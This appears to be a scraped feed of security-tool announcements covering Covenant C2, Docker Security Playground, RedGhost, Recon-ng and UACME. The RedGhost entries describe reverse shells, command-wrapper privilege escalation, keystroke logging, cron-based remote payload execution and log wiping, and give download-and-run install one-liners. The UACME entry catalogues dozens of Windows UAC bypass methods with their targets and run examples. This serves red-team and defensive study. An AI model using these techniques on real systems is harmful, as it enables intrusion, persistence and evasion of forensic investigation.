Covenant – A .NET Command And Control Framework For Red Teamers

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.Quick-Start GuidePlease see the Installation and Startup guide to get started with Covenant!The Wiki documents most of Covenant’s core features and how to use them.FeaturesCovenant has several key features that make it useful and differentiate it from other command and control frameworks:Intuitive Interface – Covenant provides an intuitive web application to easily run a collaborative red team operation.Multi-Platform – Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.Multi-User – Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.API Driven – Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.Listener Profiles – Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire.Encrypted Key Exchange – Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.Dynamic Compilation – Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.Inline C# Execution – Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.Tracking Indicators – Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in it’s infancy and still has room for improvement.Developed in C# – Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.Questions and DiscussionHave questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.Download Covenant

Link: http://feedproxy.google.com/~r/PentestTools/~3/FRnRVXGYQT8/covenant-net-command-and-control.html

DockerSecurityPlayground – A Microservices-based Framework For The Study Of Network Security And Penetration Test Techniques

Docker Security Playground is an application that allows you to:Create network and network security scenarios, in order to understand network protocols, rules, and security issues by installing DSP in your PC.Learn penetration testing techniques by simulating vulnerability labs scenariosManage a set of docker-compose project . Main goal of DSP is to learn in penetration testing and network security, but its flexibility allows you the creation, graphic editing and managment run / stop of all your docker-compose labs. For more information look at the Labs Managment page.DSP FeaturesGraphic Editor of docker-composeDocker Image ManagementGIT IntegrationDSP Repository with a set of network sescurity scenariosHow can I share my labs with the world ?During the installation you can create a local environment that has not link with git, or you can associate a personal repository the the application. This is very useful if you want to share your work with other people.DSP Repository must have several requirements, so I have created a base DSP Repo Template that you can use to create your personal repository.So, the easiest way to share labs is the following:Fork the DSP_Repo project: https://github.com/giper45/DSP_Repo.gitDuring the installation set github directory param to your forked repository.Now create your labs and share it!It is important that all images that you use should be available to other users, so:You can publish on docker hub so other users can pull your images in order to use your labs.You can provide dockerfiles inside the .docker-images directory, so users can use build.sh to build your images and use your repo.If you need a “private way" to share labs you should share the repository in other ways, at current time there is no support to share private repositories.In DSP you can manage multiple user repositories (Repositories tab)PrerequisitesNodejs (v 7 or later)gitdockerdocker-composecompiler tools (g++, c, c++)InstallationInstall prerequisites and run:npm installTroubleshooting during installationIf you have error regarding node-pty module, try to:Install build-essentials : (In Ubuntu: apt install -y build-essentials)Use nodejs LTS (note-pty has some isseus, as shown hereUpdate the application:When you update the application it is important to update the npm packages (The application uses mydockerjs, a npm docker API that I am developing during DSP development: https://www.npmjs.com/package/mydockerjs)npm run updateStartRunnpm start To start the application. This will launch a server listening on 8080 (or another if you set have setted ENV variable in index.js file) port of your localhost.Go to you favourite browser and digit localhost:8080. You’ll be redirected on installation page, set parameters and click install.DocumentationFor documentation about DSP usage go to Wiki page:Main Page: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/homeUser Guidehttp://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/user_guideDocker Wrapper Image: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/dsp_wrapper_imageIt is a little outdated, I will update it as possible !Docker Wrapper ImageDSP implements a label convention called DockerWrapperImage that allows you to create images that expose action to execute when a lab is running. Look at the docError DebugMacOS ECONNRESET error:events.js:183 throw er; // Unhandled ‘error’ event ^Error: read ECONNRESET at _errnoException (util.js:992:11) at TCP.onread (net.js:618:25)On Mac it seems that there is some problem with some node package, so in order to solve this run:MacBook-Pro:DockerSecurityPlayground gaetanoperrone$ npm install ws@3.3.2 –save-dev –save-exactOther info here: http://gitlab.comics.unina.it/NS-Thesis/DockerSecurityPlayground_1/wikis/docker-operation-errorsContributingFork it!Create your feature branch: git checkout -b my-new-featureCommit your changes: git commit -am ‘Add some feature’Push to the branch: git push origin my-new-featureSubmit a pull request, we’ll checkAny Questions?Use the Issues in order to ask everything you want!.LinksDSP Vagrant Box used in Blackhat SessionBlackhat scenario in GitlabRelevant DSP Repositorieshttps://github.com/giper45/DSP_Projects.git : Official DSP Repositoryhttps://github.com/giper45/DSP_Repo.git : DSP Template to create another repository: fork it to start creating your personal remote environmenthttps://github.com/NS-unina/DSP_Repo.git : Repository created for Network Security Course of Simon Pietro Romano in University of the Study in Naples, Federico IIContributorsTechnical support: Gaetano Perrone, Francesco CaturanoDocumentation support Gaetano Perrone, Francesco CaturanoApplication design: Gaetano Perrone, Simon Pietro RomanoApplication development: Gaetano Perrone, Francesco CaturanoDocker wrapper image development: Gaetano Perrone, Francesco CaturanoThanks to Giuseppe Criscuolo for the logo designChangelogGot to CHANGELOG.md to see al the version changes.Download DockerSecurityPlayground

Link: http://feedproxy.google.com/~r/PentestTools/~3/SB-rKad-N3A/dockersecurityplayground-microservices.html

RedGhost v3.0 – Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace

Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.PayloadsFunction to generate various encoded reverse shells in netcat, bash, python, php, ruby, perlSudoInjectFunction to inject sudo command with wrapper function to run a reverse root shell everytime “sudo" is run for privilege escalataionlsInjectFunction to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistenceSSHKeyInjectFunction to log keystrokes of a ssh process using straceCrontabFunction to create cron job that downloads payload from remote server and runs payload every minute for persistenceSysTimerFunction to create systemd timer that downloads and executes payload every 30 seconds for persistence.GetRootFunction to try various methods to escalate privilegesClearlogsFunction to clear logs and make investigation with forensics difficultMassInfoGrabFunction to grab mass reconaissance/information on systemCheckVMFunction to check if the system is a virtual machineMemoryExecFunction to execute remote bash script in memoryBanIpFunction to BanIp using iptablesInstallationone liner to install RedGhost:wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.shOne liner to install prerequisites and RedGhost:wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; apt-get install strace; ./redghost.shPrerequisitesdialog, gcc, iptables, straceDownload RedGhost

Link: http://feedproxy.google.com/~r/PentestTools/~3/r5pc37rjXcE/redghost-v30-linux-post-exploitation.html

Recon-ng v5.0.0 – Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources

Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.Recon-ng has a look and feels similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.Download Recon-Ng

Link: http://feedproxy.google.com/~r/PentestTools/~3/aJ03REwtdTs/recon-ng-v500-open-source-intelligence.html

RedGhost v2.0 – Linux Post Exploitation Framework Designed To Assist Red Teams In Gaining Persistence, Reconnaissance And Leaving No Trace

Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.PayloadsFunction to generate various encoded reverse shells in netcat, bash, python, php, ruby, perlSudoInjectFunction to inject sudo command with wrapper function to run a reverse root shell everytime “sudo" is run for privilege escalataionlsInjectFunction to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistenceCrontabFunction to create cron job that downloads payload from remote server and runs payload every minute for persistenceGetRootFunction to try various methods to escalate privilegesClearlogsFunction to clear logs and make investigation with forensics difficultMassInfoGrabFunction to grab mass reconaissance/information on systemBanIpFunction to BanIp using iptablesInstallationone liner to install RedGhost:wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.shOne liner to install prerequisites and RedGhost:wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; ./redghost.shPrerequisitesdialog, gcc, iptablesDownload RedGhost

Link: http://feedproxy.google.com/~r/PentestTools/~3/VgaanjAU6kw/redghost-v20-linux-post-exploitation.html

UACME – Defeating Windows User Account Control

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.System Requirementsx86-32/x64 Windows 7/8/8.1/10 (client, some methods however works on server version too).Admin account with UAC set on default settings required.UsageRun executable from command line: akagi32 [Key] [Param] or akagi64 [Key] [Param]. See “Run examples" below for more info.First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty – in this case program will execute elevated cmd.exe from system32 folder.Keys (watch debug output with dbgview or similar for more info):Author: Leo Davidson Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): cryptbase.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifest elementsAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): ShCore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 8.1 (9600)Fixed in: Windows 10 TP (> 9600) How: Side effect of ShCore.dll moving to \KnownDllsAuthor: Leo Davidson derivative by WinNT/Pitou Type: Dll HijackMethod: IFileOperationTarget(s): \system32\oobe\setupsqm.exeComponent(s): WdsCore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10558) How: Side effect of OOBE redesignAuthor: Jon Ericson, WinNT/Gootkit, mzH Type: AppCompatMethod: RedirectEXE ShimTarget(s): \system32\cliconfg.exeComponent(s): -Implementation: ucmShimRedirectEXEWorks from: Windows 7 (7600)Fixed in: Windows 10 TP (> 9600) How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versionsAuthor: WinNT/Simda Type: Elevated COM interfaceMethod: ISecurityEditorTarget(s): HKLM registry keysComponent(s): -Implementation: ucmSimdaTurnOffUacWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: ISecurityEditor interface method changedAuthor: Win32/Carberp Type: Dll HijackMethod: WUSATarget(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exeComponent(s): WdsCore.dll, CryptBase.dll, CryptSP.dllImplementation: ucmWusaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removedAuthor: Win32/Carberp derivative Type: Dll HijackMethod: WUSATarget(s): \system32\cliconfg.exeComponent(s): ntwdblib.dllImplementation: ucmWusaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removedAuthor: Leo Davidson derivative by Win32/Tilon Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): Actionqueue.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifestAuthor: Leo Davidson, WinNT/Simda, Win32/Carberp derivative Type: Dll HijackMethod: IFileOperation, ISecurityEditor, WUSATarget(s): IFEO registry keys, \system32\cliconfg.exeComponent(s): Attacker defined Application Verifier DllImplementation: ucmAvrfMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH1 (10147) How: WUSA /extract option removed, ISecurityEditor interface method changedAuthor: WinNT/Pitou, Win32/Carberp derivative Type: Dll HijackMethod: IFileOperation, WUSATarget(s): \system32\{New}or{Existing}\{autoelevated}.exe, e.g. winsat.exeComponent(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dllImplementation: ucmWinSATMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10548) How: AppInfo elevated application path control hardeningAuthor: Jon Ericson, WinNT/Gootkit, mzH Type: AppCompatMethod: Shim Memory PatchTarget(s): \system32\iscsicli.exeComponent(s): Attacker prepared shellcodeImplementation: ucmShimPatchWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versionsAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): dbgcore.dllImplementation: ucmStandardAutoElevationWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 TH2 (10565) How: sysprep.exe manifest updatedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\mmc.exe EventVwr.mscComponent(s): elsext.dllImplementation: ucmMMCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: Missing dependency removedAuthor: Leo Davidson, WinNT/Sirefef derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system\credwiz.exe, \system32\wbem\oobe.exeComponent(s): netutils.dllImplementation: ucmSirefefMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 TH2 (10548) How: AppInfo elevated application path control hardeningAuthor: Leo Davidson, Win32/Addrop, Metasploit derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\cliconfg.exeComponent(s): ntwdblib.dllImplementation: ucmGenericAutoelevationWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: Cliconfg.exe autoelevation removedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exeComponent(s): SLC.dllImplementation: ucmGWXWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14316) How: AppInfo elevated application path control and inetmgr executable hardeningAuthor: Leo Davidson derivative Type: Dll Hijack (Import forwarding)Method: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): unbcl.dllImplementation: ucmStandardAutoElevation2Works from: Windows 8.1 (9600)Fixed in: Windows 10 RS1 (14371) How: sysprep.exe manifest updatedAuthor: Leo Davidson derivative Type: Dll Hijack (Manifest)Method: IFileOperationTarget(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest)Component(s): Attacker definedImplementation: ucmAutoElevateManifestWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14371) How: Manifest parsing logic reviewedAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\inetsrv\inetmgr.exeComponent(s): MsCoree.dllImplementation: ucmInetMgrMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14376) How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32ImagesAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\mmc.exe, Rsop.mscComponent(s): WbemComn.dllImplementation: ucmMMCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16232) How: Target requires wbemcomn.dll to be signed by MSAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperation, SxS DotLocalTarget(s): \system32\sysprep\sysprep.exeComponent(s): comctl32.dllImplementation: ucmSXSMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16232) How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32ImagesAuthor: Leo Davidson derivative Type: Dll HijackMethod: IFileOperation, SxS DotLocalTarget(s): \system32\consent.exeComponent(s): comctl32.dllImplementation: ucmSXSMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Leo Davidson derivative Type: Dll HijackMethod: IFileOperationTarget(s): \system32\pkgmgr.exeComponent(s): DismCore.dllImplementation: ucmDismMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: BreakingMalware Type: Shell APIMethod: Environment variables expansionTarget(s): \system32\CompMgmtLauncher.exeComponent(s): Attacker definedImplementation: ucmCometMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS2 (15031) How: CompMgmtLauncher.exe autoelevation removedAuthor: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exeComponent(s): Attacker definedImplementation: ucmHijackShellCommandMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS2 (15031) How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removedAuthor: Enigma0x3 Type: Race ConditionMethod: File overwriteTarget(s): %temp%\GUID\dismhost.exeComponent(s): LogProvider.dllImplementation: ucmDiskCleanupRaceConditionWorks from: Windows 10 TH1 (10240)AlwaysNotify compatibleFixed in: Windows 10 RS2 (15031) How: File security permissions alteredAuthor: ExpLife Type: Elevated COM interfaceMethod: IARPUninstallStringLauncherTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmUninstallLauncherMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16199) How: UninstallStringLauncher interface removed from COMAutoApprovalListAuthor: Exploit/Sandworm Type: Whitelisted componentMethod: InfDefaultInstallTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmSandwormMethodWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)Author: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmAppPathMethodWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 RS3 (16215) How: Shell API updateAuthor: Leo Davidson derivative, lhc645 Type: Dll HijackMethod: WOW64 loggerTarget(s): \syswow64\{any elevated exe, e.g wusa.exe}Component(s): wow64log.dllImplementation: ucmWow64LoggerMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmSdcltIsolatedCommandMethodWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 RS4 (17025) How: Shell API / Windows components updateAuthor: xi-tauw Type: Dll HijackMethod: UIPI bypass with uiAccess applicationTarget(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exeComponent(s): duser.dll, osksupport.dllImplementation: ucmUiAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: winscripting.blog Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\fodhelper.exe, \system32\computerdefaults.exeComponent(s): Attacker definedImplementation: ucmMsSettingsDelegateExecuteMethodWorks from: Windows 10 TH1 (10240)Fixed in: unfixed , How: -Author: James Forshaw Type: Shell APIMethod: Environment variables expansionTarget(s): \system32\svchost.exe via \system32\schtasks.exeComponent(s): Attacker definedImplementation: ucmDiskCleanupEnvironmentVariableWorks from: Windows 8.1 (9600)AlwaysNotify compatibleFixed in: unfixed , How: -Author: CIA & James Forshaw Type: ImpersonationMethod: Token ManipulationsTarget(s): Autoelevated applicationsComponent(s): Attacker definedImplementation: ucmTokenModificationWorks from: Windows 7 (7600)AlwaysNotify compatible, see noteFixed in: Windows 10 RS5 (17686) How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check addedAuthor: Thomas Vanhoutte aka SandboxEscaper Type: Race conditionMethod: NTFS reparse point & Dll HijackTarget(s): wusa.exeComponent(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dllImplementation: ucmJunctionMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ernesto Fernandez, Thomas Vanhoutte Type: Dll HijackMethod: SxS DotLocal, NTFS reparse pointTarget(s): \system32\dccw.exeComponent(s): GdiPlus.dllImplementation: ucmSXSDccwMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Clement Rouault Type: Whitelisted componentMethod: APPINFO command line spoofingTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmHakrilMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Stefan Kanthak Type: Dll HijackMethod: .NET Code ProfilerTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCorProfilerMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ruben Boonen Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exe, \System32\recdisc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: Oddvar Moe Type: Elevated COM interfaceMethod: ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmCMLuaUtilShellExecMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: BreakingMalware and Enigma0x3 Type: Elevated COM interfaceMethod: IFwCplLuaTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmFwCplLuaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: Oddvar Moe derivative Type: Elevated COM interfaceMethod: IColorDataProxy, ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDccwCOMMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: bytecode77 Type: Shell APIMethod: Environment variables expansionTarget(s): Multiple auto-elevated processesComponent(s): Various per targetImplementation: ucmVolatileEnvMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16299) How: Current user system directory variables ignored during process creationAuthor: bytecode77 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\slui.exeComponent(s): Attacker definedImplementation: ucmSluiHijackMethodWorks from: Windows 8.1 (9600)Fixed in: unfixed , How: -Author: Anonymous Type: Race ConditionMethod: Registry key manipulationTarget(s): \system32\BitlockerWizardElev.exeComponent(s): Attacker definedImplementation: ucmBitlockerRCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (>16299) How: Shell API updateAuthor: clavoillotte & 3gstudent Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethod2Works from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: deroko Type: Elevated COM interfaceMethod: ISPPLUAObjectTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmSPPLUAObjectMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: ISPPLUAObject interface method changedAuthor: RinN Type: Elevated COM interfaceMethod: ICreateNewLinkTarget(s): \system32\TpmInit.exeComponent(s): WbemComn.dllImplementation: ucmCreateNewLinkMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14393) How: Side effect of consent.exe COMAutoApprovalList introductionAuthor: Anonymous Type: Elevated COM interfaceMethod: IDateTimeStateWrite, ISPPLUAObjectTarget(s): w32time serviceComponent(s): w32time.dllImplementation: ucmDateTimeStateWriterMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: Side effect of ISPPLUAObject interface changeAuthor: bytecode77 derivative Type: Elevated COM interfaceMethod: IAccessibilityCplAdminTarget(s): \system32\rstrui.exeComponent(s): Attacker definedImplementation: ucmAcCplAdminMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: David Wells Type: Whitelisted componentMethod: AipNormalizePath parsing abuseTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDirectoryMockMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Emeric Nasi Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: egre55 Type: Dll HijackMethod: Dll path search abuseTarget(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exeComponent(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dllImplementation: ucmEgre55MethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: James Forshaw Type: GUI HackMethod: UIPI bypass with token modificationTarget(s): \system32\osk.exe, \system32\msconfig.exeComponent(s): Attacker definedImplementation: ucmTokenModUIAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Hashim Jawad Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\WSReset.exeComponent(s): Attacker definedImplementation: ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (17134)Fixed in: unfixed , How: -Author: Leo Davidson derivative by Win32/Gapz Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): unattend.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifest elementsNote:Method (6) unavailable in wow64 environment starting from Windows 8;Method (11) (54) implemented only in x86-32 version;Method (13) (19) (30) (38) (50) implemented only in x64 version;Method (14) require process injection, wow64 unsupported, use x64 version of this tool;Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;Method (30) require x64 because it abuses WOW64 subsystem feature;Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway;Method (38) require internet connection as it executes remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;Method (55) is not really reliable (as any GUI hacks) and included just for fun.Run examples:akagi32.exe 1akagi64.exe 3akagi32 1 c:\windows\system32\calc.exeakagi64 3 c:\windows\system32\charmap.exeWarningThis tool shows ONLY popular UAC bypass method used by malware, and reimplement some of them in a different way improving original concepts. There are exists different, not yet known to general public methods, be aware of this;Using (5) method will permanently turn off UAC (after reboot), make sure to do this in test environment or don’t forget to re-enable UAC after tool usage;Using (5), (9) methods will permanently compromise security of target keys (UAC Settings key for (5) and IFEO for (9)), if you do tests on your real machine – restore keys security manually after you complete this tool usage;This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft – you use it at your own risk;Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope;If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code;Most of methods created for x64, with no x86-32 support in mind. I don’t see any sense in supporting 32 bit versions of Windows or wow64, however with small tweaks most of them will run under wow64 as well.If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105Windows 10 support and testing policyEOL’ed versions of Windows 10 are not supported and therefore not tested (at moment of writing EOL’ed Windows 10 versions are: TH1 (10240), TH2 (10586));Insider builds are not supported as methods may be fixed there.ProtectionAccount without administrative privileges.Malware usageIt is currently known that UACMe used by Adware/Multiplug (9), by Win32/Dyre (3), by Win32/Empercrypt (10 & 13), by IcedID downloader (35 & 41). We do not take any responsibility for this tool usage in the malicious purposes. It is free, open-source and provided AS-IS for everyone.Other usageCurrently used as "signature" by "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool usage in the fraudware;The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool usage in the scamware. The repository https://github.com/hfiref0x/UACME and it contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere as well as modifications (forks);In July 2016 so-called "security company" Cymmetria released report about script-kiddie malware bundle called "Patchwork" and false flagged it as APT. They stated it was using "UACME method", which in fact is just slightly and unprofessionally modified injector dll from UACMe v1.9 and was using Carberp/Pitou hybrid method in malware self-implemented way. We do not take any responsibility for UACMe usage in the dubious advertising campaigns from third party "security companies".BuildUACMe comes with full source code, written in C with some parts written in C#;In order to build from source you need Microsoft Visual Studio 2013/2015 U2 and later versions.Instructions Select Platform ToolSet first for project in solution you want to build (Project->Properties->General): v120 for Visual Studio 2013;v140 for Visual Studio 2015;v141 for Visual Studio 2017. For v140 and above set Target Platform Version (Project->Properties->General): If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed). Note that Fujinami module built with .NET Framework 3.0 (this is requirement for it work), so .NET Framework 3.0 must be installed if you want to build this module. Can be built with SDK 8.1/10.17134/10.17763. ReferencesWindows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.htmlMalicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdfJunfeng Zhang from WinSxS dev team 